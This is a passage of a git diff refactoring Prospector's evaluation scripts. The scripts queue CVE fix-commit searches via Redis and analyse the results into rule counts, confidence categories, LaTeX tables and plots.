".join(build_table_row(rules)), + "&", + " & ".join([str(x) for x in ranks]).replace("-1", ""), + "\\\\ \\midrule", + ) + for rule in rules: + rulescount[rule] += 1 + # print(itm[0] + " - " + str(position + 1)) + # print( + # f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]} pos:{position}" + # ) + # if int(timestamp / 86400) < 731: + # timestamps["low_confidence"].append(int(timestamp / 86400)) + # print(itm[0], position + 1) + elif is_fix and not has_certainty and position >= 10: + results["not_found"].add(itm[0]) + for rule in rules: + rulescount[rule] += 1 + # timestamps["not_found"].append(int(timestamp / 86400)) + # print(itm[0], position + 1) + # print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") + elif not is_fix and has_certainty: + results["false_positive"].add(itm[0]) + with open("false_postive", "a") as file: + writer = csv.writer(file) + writer.writerow( + [f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}"] + ) + print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") + elif not is_fix and not has_certainty and commit_id and position < 0: + results["not_reported"].add(itm[0]) + print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") + elif not is_fix and not exists and position < 0: + skipped += 1 + # print( + # ",".join( + # results["not_reported"] + # | results["not_found"] + # | results["false_positive"] + # | results["low_confidence"] + # | results["medium_confidence"] + # | results["CVE_ID_IN_LINKED_ISSUE"] + # | results["CROSS_REFERENCE"] + # | results["CVE_ID_IN_MESSAGE"] + # ) + # ) + total = len(dataset) - skipped + rulescount = dict(sorted(rulescount.items())) + + plt.rcParams["figure.autolayout"] = True + plt.rcParams["savefig.dpi"] = 300 + sns.set_style("whitegrid") + colors = [ + ( + "#ffa600" + if id + in ( + "COMMIT_IN_REFERENCE", + "CROSS_REFERENCED_GH_LINK", + "CROSS_REFERENCED_JIRA_LINK", + "CVE_ID_IN_LINKED_ISSUE", + "CVE_ID_IN_MESSAGE", + ) + else "#003f5c" + ) + for id in rulescount.keys() + ] + ss = sns.barplot( + x=list(rulescount.keys()), + y=list(rulescount.values()), + palette=colors, + width=0.6, + ) + plt.xticks(rotation="vertical") + # ss.set_xscale("log", base=2) + # ss.set_xticks([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]) + # ss.set_xticklabels([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024], rot) + + # ss.set_xticks(range(0, 800, 100)) + ss.tick_params(axis="x", labelsize=8) + # plt.show() + plt.savefig("project-kb.png") + + for rule, count in rulescount.items(): + print(f"{rule}: {count}") + # missing_lookup_git(missing) + + # print(YEAR) + print() + total_check = sum([len(x) for x in results.values()]) + print(total_check) + # total_year = sum([len([x for x in y if YEAR in x]) for y in results.values()]) + for key, value in results.items(): + print(f"{key}: {len(value)} ({(len(value)/1315)*100:.2f}%)") + # print( + # f"{key}: {(len([x for x in value if YEAR in x]) / total_year) * 100:.2f}%" + # ) + + # total_check += len(value) + yearly_timestamps = {k: v for k, v in yearly_timestamps.items() if len(v) > 30} + # df = pd.DataFrame(dict([(k, pd.Series(v)) for k, v in timestamps.items()])) + + # ax = sns.violinplot(df, inner="box") + # plt.ylabel("Days") + # plt.show() + + # for key, value in timestamps.items(): + # print( + # f"{key}: mean={int(statistics.mean(value))} stdDev={int(statistics.stdev(value))}" + # ) + + # df = pd.DataFrame.from_dict(timestamps, orient="index") + + # sns.set(style="whitegrid") + # sns.violinplot(data=df) + + if total_check != total: + print("ERROR: Some CVEs are missing") + + return missing + + +def sum_relevances(list_of_rules): + return sum([r["relevance"] for r in list_of_rules]) + + +def check_report_get_rules(dataset, cve, fixing_commits): + with open(f"{dataset}/{cve}.json", "r") as file: + data = json.load(file) + # not_fixing = [ + # commit + # for commit in data["commits"] + # if commit["commit_id"] not in fixing_commits + # ] + # if len(not_fixing) == 0: + # return [], 0, 0, 0 + # return ( + # [r["id"] for r in not_fixing[0]["matched_rules"]], + # 1, + # 1, + # not_fixing[0]["commit_id"], + # ) + for i, commit in enumerate(data["commits"]): + if commit["commit_id"] in fixing_commits: + return ( + [r["id"] for r in commit["matched_rules"]], + i + 1, + sum_relevances(commit["matched_rules"]), + commit["commit_id"], + ) + + if "twins" in commit: + for twin in commit["twins"]: + if twin[1] in fixing_commits: + return ( + [r["id"] for r in commit["matched_rules"]], + i + 1, + sum_relevances(commit["matched_rules"]), + commit["commit_id"], + ) + # return ( + # [r["id"] for r in commit["matched_rules"]], + # i + 1, + # sum_relevances(commit["matched_rules"]), + # commit["commit_id"], + # ) + return None, None, None, None + + +def has_certainty(rules: List[Dict]): + if any(rule["id"] == "COMMIT_IN_REFERENCE" for rule in rules): + return "COMMIT_IN_REFERENCE" + if any(rule["id"] == "CVE_ID_IN_MESSAGE" for rule in rules): + return "CVE_ID_IN_MESSAGE" + if any( + rule["id"] in ("CROSS_REFERENCED_JIRA_LINK", "CROSS_REFERENCED_GH_LINK") + for rule in rules + ): + return "CROSS_REFERENCE" + if any(rule["id"] == "CVE_ID_IN_LINKED_ISSUE" for rule in rules): + return "CVE_ID_IN_LINKED_ISSUE" + + return False + + +def get_first_commit_score(data): + if len(data["commits"]) == 0: + return -1 + else: + return sum_relevances(data["commits"][0]["matched_rules"]) + + +def is_fixing_commit(commit, fixing_commits): + return commit["commit_id"] in fixing_commits or any( + twin[1] in fixing_commits for twin in commit.get("twins", []) + ) + + +def get_commit_info(commit, index, score_first, score_next): + return ( + True, + has_certainty(commit["matched_rules"]), + commit["commit_id"], + True, + index, + [ + index + 1, + sum_relevances(commit["matched_rules"]), + score_first, + score_next, + ], + [r["id"] for r in commit["matched_rules"]], + ) + + +def get_non_fixing_commit_info(commit, index, score_first): + cert = has_certainty(commit["matched_rules"]) + if cert != 0: + return ( + False, + cert, + commit["commit_id"], + True, + index, + [ + sum_relevances(commit["matched_rules"]), + score_first, + -1, + ], + [r["id"] for r in commit["matched_rules"]], + ) + return None + + +def check_report(dataset, cve, fixing_commits): + try: + with open(f"{dataset}/{cve}.json", "r") as file: + data = json.load(file) + score_first = get_first_commit_score(data) + + for index, commit in enumerate(data["commits"]): + score_next = -1 + if index > 0: + score_next = sum_relevances( + data["commits"][index - 1]["matched_rules"] + ) + + if is_fixing_commit(commit, fixing_commits): + if index == 0: + score_first = -1 + return get_commit_info(commit, index, score_first, score_next) + + for index, commit in enumerate(data["commits"]): + commit_info = get_non_fixing_commit_info(commit, index, score_first) + if commit_info: + return commit_info + + return (False, 0, True, True, -1, None, []) + + except FileNotFoundError: + return False, 0, None, False, -1, None, [] + + +def process_json_report(dataset, cve, commits): + out = [] + exists = True + try: + with open(f"{dataset}/{cve}/{cve}.json", "r") as file: + data = json.load(file) + processed_commits = {} + for i, commit in enumerate(data["commits"]): + processed_commits[commit["commit_id"]] = [ + sum_relevances(commit["matched_rules"]), + i + 1, + ] + if commit["commit_id"] in commits: + processed_commits.pop(commit["commit_id"]) + current = [ + cve, + i + 1, + sum_relevances(commit["matched_rules"]), + None, + None, + None, + ] + current[3] = len( + [k for k, v in processed_commits.items() if v[0] == current[2]] + ) + if i > 0: + current[4] = sum_relevances(data["commits"][0]["matched_rules"]) + r_next = 0 + for j in range(i, -1, -1): + r_next = sum_relevances(data["commits"][j]["matched_rules"]) + if r_next > current[2]: + current[5] = r_next + break + out = current + exists = True + break + except FileNotFoundError: + exists = False + return exists, out + + +def analyze_rules_usage(dataset_path: str, cve: str = ""): + dataset = load_dataset(dataset_path) + rules: Dict[str, int] = {} + commit_count = 0 + cve_count = 0 + for itm in dataset: + cve_count += 1 + with open(f"{dataset_path[:-4]}/{itm[0]}/{itm[0]}.json", "r") as file: + data = json.load(file) + for commit in data["commits"]: + commit_count += 1 + for rule in commit["matched_rules"]: + if rule["id"] in rules: + rules[rule["id"]] += 1 + else: + rules[rule["id"]] = 1 + + sorted_rules = { + k: v for k, v in sorted(rules.items(), key=lambda item: item[1], reverse=True) + } + print(f"\nTotal commits: {commit_count}") + print(f"Total cves: {cve_count}\n") + for k, v in sorted_rules.items(): + print(f"{k}: {v}") + + +def is_real_version(text: str): + return bool(re.match(r"\d+\.(?:\d+\.*)*\d", text)) + + +VULN = ["version", "through", "versions"] + +FIXED = [ + "before", + "before release", + "before version", + "prior to", + "upgrade to", + "fixed in", + "fixed in version", + "fixed in release", + "to version", +] + + +def get_version_spacy(text: str, nlp): + doc = nlp(text) + # relevant_sentences = {} + # relevant_sentence = "" + fixed_version = "" + vulnerable_version = "" + for i in range(len(doc))[1:]: + if is_real_version(doc[i].text): + if doc[i - 1].text in FIXED: + # relevant_sentence = doc[: i + 1] + fixed_version = doc[i].text + elif (doc[i - 2].text + " " + doc[i - 1].text) in FIXED: + # relevant_sentence = doc[: i + 1] + fixed_version = doc[i].text + elif ( + doc[i - 3].text + " " + doc[i - 2].text + " " + doc[i - 1].text + ) in FIXED: + # relevant_sentence = doc[: i + 1] + fixed_version = doc[i].text + else: + # relevant_sentence = doc[: i + 1] + vulnerable_version = doc[i].text + return vulnerable_version, fixed_version + + +def check_advisory(cve, repository=None, nlp=None): + advisory = build_advisory_record( + cve, nvd_rest_endpoint="http://localhost:8000/nvd/vulnerabilities/" + ) + references = [urlparse(r).netloc for r in advisory.references] + return references + vuln = "None" + if len(advisory.versions.get("affected")): + vuln = advisory.versions.get("affected")[-1] + + fixed = "None" + if len(advisory.versions.get("fixed")): + fixed = advisory.versions.get("fixed")[-1] + + vuln2, fixed2 = get_version_spacy(advisory.description, nlp) + res = [advisory.cve_id, advisory.description] + if fixed == fixed2 and vuln == vuln2: + res.append(f"{vuln}:{fixed}") + if fixed == "None" and fixed2 != "": + res.append(f"{vuln}:{fixed2}") + if vuln == "None" and vuln2 != "": + res.append(f"{vuln2}:{fixed}") + if fixed != fixed2 and fixed2 != "" and fixed != "None": + res.append(f"{vuln}:{fixed}") + res.append(f"{vuln}:{fixed2}") + + if len(res) > 2: + res.append("***************************************") + print(advisory.cve_id) + return res + else: + res.append(f"{vuln}:{fixed}") + res.append("***************************************") + print(advisory.cve_id) + return res diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py new file mode 100644 index 000000000..a90f7aee9 --- /dev/null +++ b/prospector/evaluation/dispatch_jobs.py @@ -0,0 +1,348 @@ +import csv +import multiprocessing +import os +from typing import List + +import redis +import requests +from dateutil.parser import isoparse +from rq import Connection, Queue +from rq.job import Job +from tqdm import tqdm + +from core.prospector import prospector +from core.report import generate_report +from git.git import Git +from git.version_to_tag import get_possible_tags +from llm.llm_service import LLMService +from util.config_parser import parse_config_file + +INPUT_DATA_PATH = "evaluation/data/input/" +PROSPECTOR_REPORT_PATH = "evaluation/data/reports/" + +# get the redis server url +config = parse_config_file() +# redis_url = config.redis_url +backend = config.backend + +redis_url = "redis://localhost:6379/0" +# print("redis url: ", redis_url) +# print("redis url: ", backend) + + +# def commit_distance_to_adv(dataset_path: str): +# dataset = load_dataset(dataset_path) +# for itm in dataset: + + +def load_dataset(path: str): + with open(path, "r") as file: + reader = csv.reader(file, delimiter=";") + return [row for row in reader if "CVE" in row[0] and row[3] != "True"] + + +def get_full_commit_ids(dataset_path: str): + dataset = load_dataset("empirical_study/datasets/" + dataset_path + ".csv") + for itm in dataset: + repository = Git(itm[1], "/sapmnt/home/I586140/intern/gitcache") + commits = [] + for commit in itm[4].split(","): + commit_id = repository.find_commit(commit) + if commit_id is not None: + commits.append(commit_id) + + print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{','.join(commits)};{itm[5]}") + + +def check_version_to_tag_matching(dataset_path: str): + dataset = load_dataset(dataset_path) + for itm in dataset: + repository = Git(itm[1], "/sapmnt/home/I586140/intern/gitcache") + tags = repository.get_tags() + + prev_version, next_version = itm[2].split(":") + prev_tag, next_tag = get_possible_tags(tags, itm[2]) + if prev_tag != "" and next_tag != "": + continue + + if prev_tag == "" and next_tag == "": + print( + f"{itm[0]}\n {prev_version}:{next_version}\n{tags}\n*****************\n" + ) + continue + if prev_tag == "": + print( + f"{itm[0]}\n {prev_version}:{next_tag}OK\n{tags}\n*****************\n" + ) + continue + if next_tag == "": + print( + f"{itm[0]}\n {prev_tag}OK:{next_version}\n{tags}\n*****************\n" + ) + continue + + # print(f"{itm[0]}\n{tags}\n") + # if prev_tag == "": + # print(f"{prev_version} -> {tags}") + + # if next_tag == "": + # print(f"{next_version} -> {tags}") + + +def get_reservation_date(cve_id: str): + # time.sleep(0.05) + url = f"https://cveawg.mitre.org/api/cve/{cve_id}" + response = requests.get(url) + if response.status_code == 200: + try: + date = response.json()["cveMetadata"]["dateReserved"] + return cve_id, int(isoparse(date).timestamp()) + except KeyError: + return None + + +def temp_load_reservation_dates(dataset_path: str): + with open(dataset_path, "r") as file: + reader = csv.reader(file, delimiter=";") + return {itm[0]: int(itm[1]) for itm in reader} + + +def build_table_row(matched_rules): + rules_list = [ + "COMMIT_IN_REFERENCE", + "CVE_ID_IN_MESSAGE", + "CVE_ID_IN_LINKED_ISSUE", + "CROSS_REFERENCED_JIRA_LINK", + "CROSS_REFERENCED_GH_LINK", + "CHANGES_RELEVANT_FILES", + "CHANGES_RELEVANT_CODE", + "RELEVANT_WORDS_IN_MESSAGE", + "ADV_KEYWORDS_IN_FILES", + "ADV_KEYWORDS_IN_MSG", + "SEC_KEYWORDS_IN_MESSAGE", + "SEC_KEYWORDS_IN_LINKED_GH", + "SEC_KEYWORDS_IN_LINKED_JIRA", + "GITHUB_ISSUE_IN_MESSAGE", + "JIRA_ISSUE_IN_MESSAGE", + "COMMIT_HAS_TWINS", + ] + out = [] + for id in rules_list: + if id in matched_rules: + out.append("/checkmark") + else: + out.append("") + return out + + +def delete_missing_git(dataset_path): + dataset = load_dataset(dataset_path) + for itm in dataset[:500]: + repository = Git(itm[1], "/sapmnt/home/I586140/intern/gitcache") + existing = [] + for commit in itm[4].split(","): + raw = repository.get_commit(commit) + try: + raw.extract_timestamp() + existing.append(commit) + except Exception: + pass + if len(itm[4].split(",")) != len(existing): + if len(existing) > 0: + print( + f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{','.join(existing)};{itm[5]}" + ) + else: + print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") + + +# def missing_lookup_git(missing: List[str]): +# # count = 0 +# for itm in missing: +# cve, repo, versions, _, commits, _ = itm.split(";") +# repository = Git(repo, "/sapmnt/home/I586140/intern/gitcache") +# # repository.clone() + +# repo_tags_o = repository.get_tags() +# repo_tags = get_possible_tags(repo_tags_o, versions) +# if repo_tags[0] is None and repo_tags[1] is None: +# continue +# versions = versions.split(":") +# # print(f"{cve}") + +# print(f"Vers: {versions}") +# print(f"Tags: {repo_tags}") +# existing = [] +# flag = False +# for commit in commits.split(","): +# raw_commit = repository.get_commit(commit) +# if raw_commit.exists(): +# existing.append(commit) + +# # if len(commits.split(",")) != len(existing): +# # if len(existing) > 0: +# # print(f"{cve};{repo};{versions};False;{','.join(existing)};") +# # else: +# # pass +# # count += 1 + +# try: +# raw_commit.tags = raw_commit.find_tags() + +# if repo_tags[0] in raw_commit.tags: +# print( +# repo + "/commit/" + raw_commit.id, +# " - ", +# "Vulnerable tag is fixed", +# ) +# elif ( +# repo_tags[1] in raw_commit.tags +# and repo_tags[0] not in raw_commit.tags +# ): +# commit_ts = raw_commit.get_timestamp() +# next_tag_ts = repository.get_timestamp(repo_tags[1], "a") +# prev_tag_ts = repository.get_timestamp(repo_tags[0], "a") +# if prev_tag_ts < commit_ts < next_tag_ts: +# print(repo + "/commit/" + raw_commit.id, " - ", "Weird") +# print( +# f"python client/cli/main.py {cve} --repository {repo} --version-interval {repo_tags[0]}:{repo_tags[1]}" +# ) +# else: +# print("Commit timestamp is outside the time interval") +# elif repo_tags[1] not in raw_commit.tags: +# if not flag: +# print("simola") +# flag = True +# print(repo + "/commit/" + raw_commit.id) +# ttags = [t for t in raw_commit.tags if repo_tags[1][:3] == t[:3]] +# print(ttags) +# if raw_commit.tags == []: +# print(repo + "/commit/" + raw_commit.id, " - ", "No tags") +# except Exception: +# print(repo + "/commit/" + raw_commit.id, " - ", "Commit not found") + +# print("=====================================") +# # print(f"Mismatch: {count}/{len(missing)}") + + +def update_comparison_table(dataset): + # data = load_dataset(dataset) + pass + + +def to_latex_table(): + data = load_dataset("results/scalco.csv") + for e in data: + print(f"{e[0]} & {e[1][19:]} & {e[5]} \\\\ \hline") # noqa: W605 + + +def parallel_execution(filename: str): + print("Executing in parallel") + print(os.getcwd()) + dataset = load_dataset("empirical_study/datasets/" + filename + ".csv") + inputs = [ + { + "vulnerability_id": cve[0], + "repository_url": cve[1], + "version_interval": cve[2], + "git_cache": "/sapmnt/home/I586140/intern/gitcache", + "limit_candidates": 2500, + "filename": filename, + "silent": True, + } + for cve in dataset + if not os.path.exists(f"empirical_study/datasets/{filename}/{cve[0]}.json") + ] + if len(inputs) == 0: + return True + try: + pool = multiprocessing.Pool(processes=4) + for _ in tqdm( + pool.imap_unordered(execute_prospector_wrapper, inputs), + total=len(inputs), + ): + pass + pool.close() + return True + except Exception: + pool.terminate() + return False + + +def execute_prospector_wrapper(kwargs): + filename = kwargs["filename"] + del kwargs["filename"] + r, a = prospector(**kwargs) + if r is not None: + generate_report(r, a, "json", f"empirical_study/datasets/{filename}/{a.cve_id}") + + +def execute_prospector(filename: str, cve: str = ""): + dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") + dataset = dataset[:3] + if len(cve) != 0: + dataset = [c for c in dataset if c[0] in cve] + + for cve in dataset: + if os.path.exists(f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json"): + continue + + print( + f"\n\n*********\n {cve[0]} ({dataset.index(cve)+1}/{len(dataset)})\n**********\n" + ) + + dispatch_job_and_generate_report( + cve[0], cve[2], f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json" + ) + + +def run_prospector(vuln_id, v_int, report_type: str, output_file): + """Call the prospector() and generate_report() functions. This also creates the LLMService singleton + so that it is available in the context of the job. + """ + + # print(f"Enabled rules: {config.enabled_rules}") # sanity check + + LLMService(config.llm_service) + + results, advisory_record = prospector( + vulnerability_id=vuln_id, + version_interval=v_int, + backend_address=backend, + enabled_rules=config.enabled_rules, + use_llm_repository_url=True, + ) + generate_report( + results, + advisory_record, + report_type, + output_file, + ) + + return results, advisory_record + + +def dispatch_job_and_generate_report( + cve_id: str, version_interval: str, report_output_file: str +): + """Dispatches a job to the queue.""" + + # Send them to Prospector to run + with Connection(redis.from_url(redis_url)): + queue = Queue() + + job = Job.create( + run_prospector, + args=( + cve_id, + version_interval, + "json", + report_output_file, + ), + description="Prospector Job", + id=cve_id, + ) + + queue.enqueue_job(job) + + print(f"Dispatched job {cve_id} to queue.") diff --git a/prospector/evaluation/run_multiple.py b/prospector/evaluation/run_multiple.py index d59f812d7..b58013a6c 100644 --- a/prospector/evaluation/run_multiple.py +++ b/prospector/evaluation/run_multiple.py @@ -1,862 +1,17 @@ # flake8: noqa import argparse -import csv -import json -import multiprocessing import os -import re import signal -import subprocess import sys -import time -from collections import OrderedDict, defaultdict -from distutils.util import strtobool -from typing import Dict, List -from urllib.parse import urlparse -import pandas as pd -import requests -import seaborn as sns -import spacy -from dateutil.parser import isoparse -from matplotlib import pyplot as plt -from tqdm import tqdm - -from core.prospector import prospector -from core.report import generate_report -from datamodel.advisory import build_advisory_record -from datamodel.nlp import extract_affected_filenames, get_names -from git.git import Git -from git.version_to_tag import get_possible_tags - - -def load_dataset(path: str): - with open(path, "r") as file: - reader = csv.reader(file, delimiter=";") - return [row for row in reader if "CVE" in row[0] and row[3] != "True"] +from evaluation.analyse import analyze_prospector, analyze_results_rules +from evaluation.dispatch_jobs import execute_prospector, parallel_execution def is_missing(path: str): return not os.path.exists(path) -def has_certainty(rules: List[Dict]): - if any(rule["id"] == "COMMIT_IN_REFERENCE" for rule in rules): - return "COMMIT_IN_REFERENCE" - if any(rule["id"] == "CVE_ID_IN_MESSAGE" for rule in rules): - return "CVE_ID_IN_MESSAGE" - if any( - rule["id"] in ("CROSS_REFERENCED_JIRA_LINK", "CROSS_REFERENCED_GH_LINK") - for rule in rules - ): - return "CROSS_REFERENCE" - if any(rule["id"] == "CVE_ID_IN_LINKED_ISSUE" for rule in rules): - return "CVE_ID_IN_LINKED_ISSUE" - - return False - - -# def commit_distance_to_adv(dataset_path: str): -# dataset = load_dataset(dataset_path) -# for itm in dataset: - - -def get_full_commit_ids(dataset_path: str): - dataset = load_dataset("empirical_study/datasets/" + dataset_path + ".csv") - for itm in dataset: - repository = Git(itm[1], "/sapmnt/home/I586140/intern/gitcache") - commits = [] - for commit in itm[4].split(","): - commit_id = repository.find_commit(commit) - if commit_id is not None: - commits.append(commit_id) - - print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{','.join(commits)};{itm[5]}") - - -def check_version_to_tag_matching(dataset_path: str): - dataset = load_dataset(dataset_path) - for itm in dataset: - repository = Git(itm[1], "/sapmnt/home/I586140/intern/gitcache") - tags = repository.get_tags() - - prev_version, next_version = itm[2].split(":") - prev_tag, next_tag = get_possible_tags(tags, itm[2]) - if prev_tag != "" and next_tag != "": - continue - - if prev_tag == "" and next_tag == "": - print( - f"{itm[0]}\n {prev_version}:{next_version}\n{tags}\n*****************\n" - ) - continue - if prev_tag == "": - print( - f"{itm[0]}\n {prev_version}:{next_tag}OK\n{tags}\n*****************\n" - ) - continue - if next_tag == "": - print( - f"{itm[0]}\n {prev_tag}OK:{next_version}\n{tags}\n*****************\n" - ) - continue - - # print(f"{itm[0]}\n{tags}\n") - # if prev_tag == "": - # print(f"{prev_version} -> {tags}") - - # if next_tag == "": - # print(f"{next_version} -> {tags}") - - -def get_reservation_date(cve_id: str): - # time.sleep(0.05) - url = f"https://cveawg.mitre.org/api/cve/{cve_id}" - response = requests.get(url) - if response.status_code == 200: - try: - date = response.json()["cveMetadata"]["dateReserved"] - return cve_id, int(isoparse(date).timestamp()) - except KeyError: - return None - - -def temp_load_reservation_dates(dataset_path: str): - with open(dataset_path, "r") as file: - reader = csv.reader(file, delimiter=";") - return {itm[0]: int(itm[1]) for itm in reader} - - -def analyze_results_rules(dataset_path: str): - print(dataset_path) - dataset_path = "empirical_study/datasets/" + dataset_path + ".csv" - dataset = load_dataset(dataset_path) - rules = {} - table = {} - count = 0 - for itm in dataset: - try: - r, i, v, id = check_report_get_rules(dataset_path[:-4], itm[0], itm[4]) - if r is not None: - count += 1 - table[itm[0]] = [id, v, r, itm] - for rule in r: - if rule not in rules: - rules[rule] = 1 - rules[rule] += 1 - except FileNotFoundError: - continue - - ordered = dict(sorted(rules.items())) - for k, v in ordered.items(): - print(f"{k} & {v} & {(v / count)*100:.2f}\\% \\\\") - - plt.rcParams["figure.autolayout"] = True - sns.set_style("whitegrid") - colors = [ - ( - "#0063B2FF" - if id - in ( - "COMMIT_IN_REFERENCE", - "CROSS_REFERENCED_GH_LINK", - "CVE_ID_IN_LINKED_ISSUE", - "CVE_ID_IN_MESSAGE", - ) - else "#9CC3D5FF" - ) - for id in ordered.keys() - ] - ss = sns.barplot( - y=list(ordered.keys()), - x=list(ordered.values()), - palette=colors, - ) - ss.set_xscale("log", base=2) - ss.set_xticks([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]) - ss.set_xticklabels([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]) - - # ss.set_xticks(range(0, 800, 100)) - ss.tick_params(axis="y", labelsize=8) - plt.show() - print(count) - for k, v in table.items(): - if "CVE_ID_IN_LINKED_ISSUE" in v[2]: - print(f"{v[3][0]};{v[3][1]};{v[3][2]};{v[3][3]};{v[3][4]};{v[3][5]}") - # print(f"{k}: {v[3]}/commit/{v[0]}") - - -def build_table_row(matched_rules): - rules_list = [ - "COMMIT_IN_REFERENCE", - "CVE_ID_IN_MESSAGE", - "CVE_ID_IN_LINKED_ISSUE", - "CROSS_REFERENCED_JIRA_LINK", - "CROSS_REFERENCED_GH_LINK", - "CHANGES_RELEVANT_FILES", - "CHANGES_RELEVANT_CODE", - "RELEVANT_WORDS_IN_MESSAGE", - "ADV_KEYWORDS_IN_FILES", - "ADV_KEYWORDS_IN_MSG", - "SEC_KEYWORDS_IN_MESSAGE", - "SEC_KEYWORDS_IN_LINKED_GH", - "SEC_KEYWORDS_IN_LINKED_JIRA", - "GITHUB_ISSUE_IN_MESSAGE", - "JIRA_ISSUE_IN_MESSAGE", - "COMMIT_HAS_TWINS", - ] - out = [] - for id in rules_list: - if id in matched_rules: - out.append("\checkmark") - else: - out.append("") - return out - - -def analyze_prospector(filename: str): # noqa: C901 - # delete_missing_git(dataset_path) - # return [] - filename = "empirical_study/datasets/" + filename + ".csv" - dataset = load_dataset(filename) - # res_ts = temp_load_reservation_dates(dataset_path[:-4] + "_timestamps.csv") - - missing = [] - skipped = 0 - timestamps = { - "COMMIT_IN_REFERENCE": list(), - "CVE_ID_IN_MESSAGE": list(), - "CVE_ID_IN_LINKED_ISSUE": list(), - "CROSS_REFERENCE": list(), - "medium_confidence": list(), - "low_confidence": list(), - } - yearly_timestamps = {} - results = { - "COMMIT_IN_REFERENCE": set(), - "CVE_ID_IN_MESSAGE": set(), - "CVE_ID_IN_LINKED_ISSUE": set(), - "CROSS_REFERENCE": set(), - "medium_confidence": set(), - "low_confidence": set(), - "not_found": set(), - "not_reported": set(), - "false_positive": set(), - "real_false_positive": set(), - } - rulescount = defaultdict(lambda: 0) - references = list() - - for itm in dataset: - try: - ( - is_fix, - has_certainty, - commit_id, - exists, - position, - ranks, - rules, - ) = check_report( - filename[:-4], itm[0], itm[4] - ) # ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS - except FileNotFoundError: - continue - - year = itm[0].split("-")[1] - # if is_fix and timestamp is not None: - # res_timestamp = get_reservation_date(itm[0]) - # if res_timestamp is not None: - # ts = timestamp - res_timestamp - # # if int(ts / 86400) > -900: - # year = itm[0].split("-")[1] - # if year not in timestamps: - # timestamps[year] = [] - # timestamps[year].append(int(ts / 86400)) - # # ts_analsis.append(int(ts / 86400)) - # else: - # print(f"Missing reservation date for {itm[0]}") - # time.sleep(0.05) - # if timestamp: - - # # adv_ts = res_ts.get(itm[0]) - # timestamp = adv_ts - timestamp - # yearly_timestamps.setdefault(year, list()) - # yearly_timestamps[year].append(int(timestamp / 86400)) - # timestamp = abs(timestamp) - - # if is_fix and position < 10: - # rules, _, _, _ = check_report_get_rules(filename[:-4], itm[0], itm[4]) - # print(itm[0], rules) - # else: - # continue - # rules, _, _, _ = check_report_get_rules(filename[:-4], itm[0], itm[4]) - # for rule in rules: - # rulescount[rule] += 1 - # continue - if is_fix and has_certainty: # and 0 <= position < 10: - print( - itm[0], - "&", - " & ".join(build_table_row(rules)), - "&", - " & ".join([str(x) for x in ranks]).replace("-1", ""), - "\\\\ \\midrule", - ) - results[has_certainty].add(itm[0]) - # if "COMMIT_IN_REFERENCE" in has_certainty and all( - # rule != "COMMIT_IN_REFERENCE" - # for rule in has_certainty - # if rule != "COMMIT_IN_REFERENCE" - # ): - # with open("only_commit_in_reference2.csv", "a", newline="") as file: - # writer = csv.writer(file) - # writer.writerow( - # [f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}"] - # ) - # elif all(rule != "COMMIT_IN_REFERENCE" for rule in has_certainty): - # with open("only_other_strong_rules.csv", "a", newline="") as file: - # writer = csv.writer(file) - # writer.writerow( - # [f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}"] - # ) - for rule in rules: - rulescount[rule] += 1 - # print(f"{filename[:-4]}/{itm[0]}.json") - # print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") - # print(f"{filename[:-4]}/{itm[0]}.json") - # timestamps["false_positive"].append(timestamp) - # elif is_fix and has_certainty and position > 0: - # results["real_false_positive"].add(itm[0]) - # if int(timestamp / 86400) < 731: - # timestamps[has_certainty].append(int(timestamp / 86400)) - elif is_fix and not has_certainty and position == 0: - print( - itm[0], - "&", - " & ".join(build_table_row(rules)), - "&", - " & ".join([str(x) for x in ranks]).replace("-1", ""), - "\\\\ \\midrule", - ) - results["medium_confidence"].add(itm[0]) - for rule in rules: - rulescount[rule] += 1 - # print(itm[0] + " - " + str(position + 1)) - - # if int(timestamp / 86400) < 731: - # timestamps["medium_confidence"].append(int(timestamp / 86400)) - elif is_fix and not has_certainty and 0 < position < 10: - results["low_confidence"].add(itm[0]) - print( - itm[0], - "&", - " & ".join(build_table_row(rules)), - "&", - " & ".join([str(x) for x in ranks]).replace("-1", ""), - "\\\\ \\midrule", - ) - for rule in rules: - rulescount[rule] += 1 - # print(itm[0] + " - " + str(position + 1)) - # print( - # f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]} pos:{position}" - # ) - # if int(timestamp / 86400) < 731: - # timestamps["low_confidence"].append(int(timestamp / 86400)) - # print(itm[0], position + 1) - elif is_fix and not has_certainty and position >= 10: - results["not_found"].add(itm[0]) - for rule in rules: - rulescount[rule] += 1 - # timestamps["not_found"].append(int(timestamp / 86400)) - # print(itm[0], position + 1) - # print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") - elif not is_fix and has_certainty: - results["false_positive"].add(itm[0]) - with open("false_postive", "a") as file: - writer = csv.writer(file) - writer.writerow( - [f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}"] - ) - print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") - elif not is_fix and not has_certainty and commit_id and position < 0: - results["not_reported"].add(itm[0]) - 